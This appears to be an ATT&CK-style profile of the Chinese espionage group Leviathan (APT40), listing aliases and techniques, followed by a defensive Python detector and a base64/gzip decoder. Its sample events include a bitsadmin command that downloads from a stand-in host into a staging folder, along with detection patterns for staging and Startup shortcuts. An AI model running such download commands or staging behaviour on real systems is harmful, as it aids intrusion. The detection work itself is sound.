Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.[1][2][3]

| Name | Description |
|---|---|
| MUDCARP | |
| Kryptonite Panda | |
| Gadolinium | |
| BRONZE MOHAWK | |
| TEMP.Jumper | Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[1][8] |
| APT40 | FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.[1][2][3][8] |
| TEMP.Periscope | Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[1][3][8] |
| Gingham Typhoon | |

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1197 | BITS Jobs | Leviathan has used BITSAdmin to download additional tools.[3] |
| Enterprise | T1047 | Windows Management Instrumentation | |
| Enterprise | T1546.003 | Event Triggered Execution: Windows Management Instrumentation Event Subscription | |
| Enterprise | T1090.003 | Proxy: Multi-hop Proxy | Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.[1] |
| Enterprise | T1534 | Internal Spearphishing | Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.[1] |
| Enterprise | T1572 | Protocol Tunneling | Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.[2] |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3] |
| Enterprise | T1547.009 | Boot or Logon Autostart Execution: Shortcut Modification | Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3] |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | |
| Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | |
| Enterprise | T1133 | External Remote Services | Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.[1] |
| Enterprise | T1203 | Exploitation for Client Execution | Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[2][3][1][4] |
| Enterprise | T1585.001 | Establish Accounts: Social Media Accounts | Leviathan has created new social media accounts for targeting efforts.[1] |
| Enterprise | T1585.002 | Establish Accounts: Email Accounts | Leviathan has created new email accounts for targeting efforts.[1] |
| Enterprise | T1560 | Archive Collected Data | Leviathan has archived the victim's data prior to exfiltration.[1] |
| Enterprise | T1003 | OS Credential Dumping | Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.[8] |
| Enterprise | T1003.001 | OS Credential Dumping: LSASS Memory | Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.[8] |
| Enterprise | T1589.001 | Gather Victim Identity Information: Credentials | Leviathan has collected compromised credentials to use for targeting efforts.[1] |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.[3][1] |
| Enterprise | T1074.002 | Data Staged: Remote Data Staging | Leviathan has staged data remotely prior to exfiltration.[1] |
| Enterprise | T1078 | Valid Accounts | Leviathan has obtained valid accounts to gain initial access.[1][4] |
| Enterprise | T1505.003 | Server Software Component: Web Shell | Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.[8][1] |
| Enterprise | T1189 | Drive-by Compromise | |
| Enterprise | T1027.001 | Obfuscated Files or Information: Binary Padding | Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.[2] |
| Enterprise | T1027.003 | Obfuscated Files or Information: Steganography | Leviathan has used steganography to hide stolen data inside other files stored on Github.[1] |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Leviathan has obfuscated code using base64 and gzip compression.[2] |
| Enterprise | T1204.001 | User Execution: Malicious Link | Leviathan has sent spearphishing email links attempting to get a user to click.[2][1] |
| Enterprise | T1204.002 | User Execution: Malicious File | Leviathan has sent spearphishing attachments attempting to get a user to click.[2][1] |
| Enterprise | T1218.010 | System Binary Proxy Execution: Regsvr32 | |
| Enterprise | T1102.003 | Web Service: One-Way Communication | Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.[3] |
| Enterprise | T1583.001 | Acquire Infrastructure: Domains | Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.[1][4] |
| Enterprise | T1586.001 | Compromise Accounts: Social Media Accounts | Leviathan has compromised social media accounts to conduct social engineering attacks.[1] |
| Enterprise | T1586.002 | Compromise Accounts: Email Accounts | Leviathan has compromised email accounts to conduct social engineering attacks.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Leviathan has downloaded additional scripts and files from adversary-controlled servers.[2][3] |
| Enterprise | T1055.001 | Process Injection: Dynamic-link Library Injection | Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.[4] |
| Enterprise | T1559.002 | Inter-Process Communication: Dynamic Data Exchange | Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents.[4] |
| Enterprise | T1021.001 | Remote Services: Remote Desktop Protocol | Leviathan has targeted RDP credentials and used them to move through the victim environment.[8] |
| Enterprise | T1021.004 | Remote Services: SSH | |
| Enterprise | T1041 | Exfiltration Over C2 Channel | |
| Enterprise | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[2][3] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.[2][1] |
| Enterprise | T1566.002 | Phishing: Spearphishing Link | Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.[2][1] |
| Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | Leviathan has used stolen code signing certificates to sign malware.[3][8] |
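Several rows in the table above describe host-level behaviour that leaves a clear telemetry footprint: BITSAdmin downloads (T1197), files written to the C:\Windows\Debug and C:\Perflogs staging directories (T1074.001), a shortcut dropped into the Startup folder (T1547.001 / T1547.009), and scripts wrapped in base64 plus gzip (T1027.013). The following is an added example written for this page, not code from MITRE, from the cited reports, or from any Leviathan sample: it runs a few detection rules over constructed process and file-creation events, and includes a helper that peels base64/gzip layers so an analyst can read the script underneath. The event schema (`type`, `image`, `cmdline`, `path` keys), the function names `detect`, `scan` and `peel_layers`, and every sample value are assumptions made for the example; map your own Sysmon or EDR fields onto the schema before use.

```python
# Added example (not from the ATT&CK page or any Leviathan report): a small,
# offline detector for three behaviours listed in the table above, run over
# constructed sample events, plus a helper that peels the base64/gzip layers
# described under T1027.013 so an analyst can read the script underneath.
import base64
import binascii
import gzip
import re
from typing import Dict, List, Tuple

# Staging directories named under T1074.001 (Data Staged: Local Data Staging).
STAGING_DIRS = (r"c:\windows\debug", r"c:\perflogs")

# A .lnk landing directly in a per-user or all-users Startup folder
# (T1547.001 / T1547.009). Paths are lower-cased before matching.
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$")


def _norm(path: str) -> str:
    """Normalise a Windows path for comparison: one separator style, lower case."""
    return path.replace("/", "\\").lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Return the technique IDs from the table above that one event matches.

    The event schema (type / image / cmdline / path) is an assumption made for
    this example; map your own telemetry (Sysmon, EDR) onto it.
    """
    hits: List[str] = []
    if event.get("type") == "process":
        image = _norm(event.get("image", ""))
        cmdline = event.get("cmdline", "").lower()
        # T1197: bitsadmin pulling a file from a remote URL (BITSAdmin download).
        if image.endswith("\\bitsadmin.exe") and "/transfer" in cmdline and "http" in cmdline:
            hits.append("T1197")
    elif event.get("type") == "file_create":
        target = _norm(event.get("path", ""))
        # T1074.001: any file written under the two staging directories.
        if any(target.startswith(d + "\\") for d in STAGING_DIRS):
            hits.append("T1074.001")
        # T1547.001: a shortcut dropped into a Startup folder.
        if STARTUP_LNK_RE.search(target):
            hits.append("T1547.001")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run detect() over a batch and keep only the events that matched."""
    results = []
    for event in events:
        hits = detect(event)
        if hits:
            results.append((event["id"], hits))
    return results


def peel_layers(blob: str, max_depth: int = 8) -> str:
    """Undo alternating base64 and gzip layers (T1027.013) until text remains.

    Stops as soon as the current layer is neither gzip (magic 1f 8b) nor a
    syntactically valid base64 string, so ordinary script text is left alone.
    """
    data = blob.encode()
    for _ in range(max_depth):
        if data[:2] == b"\x1f\x8b":
            data = gzip.decompress(data)
            continue
        stripped = b"".join(data.split())  # tolerate line-wrapped base64
        try:
            data = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            break
    return data.decode("utf-8", errors="replace")


# --- Constructed sample input (not real telemetry) ---------------------------
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://example.invalid/t.txt C:\PerfLogs\t.txt"},
    {"id": 2, "type": "file_create", "path": r"C:\PerfLogs\t.txt", "process": "bitsadmin.exe"},
    {"id": 3, "type": "file_create", "process": "wscript.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"id": 4, "type": "file_create", "path": r"C:\Users\alice\Documents\report.docx", "process": "winword.exe"},
    {"id": 5, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline": "bitsadmin /list"},
]

# A harmless script wrapped the way the page describes: gzip, then base64.
SAMPLE_SCRIPT = 'WScript.Echo("decoded layer");'
SAMPLE_BLOB = base64.b64encode(gzip.compress(SAMPLE_SCRIPT.encode())).decode()

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
    print(peel_layers(SAMPLE_BLOB))
```

Events 1, 2 and 3 match T1197, T1074.001 and T1547.001 respectively; the `bitsadmin /list` event and the ordinary document write produce nothing, which is the point of keying the BITS rule on `/transfer` plus a URL rather than on the binary name alone. Because staging directories and the Startup folder are also used legitimately, treat these hits as triage leads to correlate with the originating process (the page notes the shortcut was written by JavaScript and the staging was followed by archiving and exfiltration) rather than as stand-alone alerts.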